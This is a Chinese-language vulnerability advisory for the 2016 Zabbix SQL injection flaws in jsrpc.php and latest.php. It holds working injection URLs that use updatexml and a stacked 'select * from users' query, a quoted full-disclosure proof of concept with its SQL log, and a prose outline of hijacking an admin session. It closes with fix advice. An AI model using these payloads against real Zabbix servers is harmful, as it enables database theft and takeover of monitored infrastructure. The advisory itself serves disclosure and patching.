漏洞概述
zabbix是一个开源的企业级性能监控解决方案。
官方网站:http://www.zabbix.com
zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,原文说是:"攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。"
但经过棱安全团队的测试发现注入的前提是需要登陆的。 不需要登陆是因为 zabbix 开启了guest权限,才可注入;而guest账号默认密码是空的
影响程度
攻击成本:低
危害程度:高
是否登陆:不需要(guest权限下)
影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)
漏洞测试
在您的zabbix的地址后面加上如下url:
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx
2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
输出结果,出现如下内容(包含:You have an error in your SQL syntax;)表示漏洞存在:
POC
==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: 1N3@CrowdShield
==========================================
Vendor Description:
Zabbix is an open source availability and performance monitoring solution.
Vulnerability Overview:
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
Business Impact:
By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
Proof of Concept:
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
Disclosure Timeline:
7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed
补充
以上为仅为漏洞验证测试方式。
攻击者可以通过进一步构造语句进行错误型sql注射,无需获取和破解加密的管理员密码。
有经验的攻击者可以直接通过获取admin的sessionid来根据结构算法构造sid,替换cookie直接以管理员身份登陆。
修复方案
尽快升级到最新版,据说3.0.4版本已经修补。
禁用guest账户
安全提示
监控系统监控着每个企业的核心资产,一旦被黑客入侵控制,等同帮助黑客进一步渗透企业敞开了大门。
请大家务必重视,并尽快修补此漏洞。
漏洞报告详情:http://seclists.org/fulldisclosure/2016/Aug/82
参考
http://seclists.org/fulldisclosure/2016/Aug/82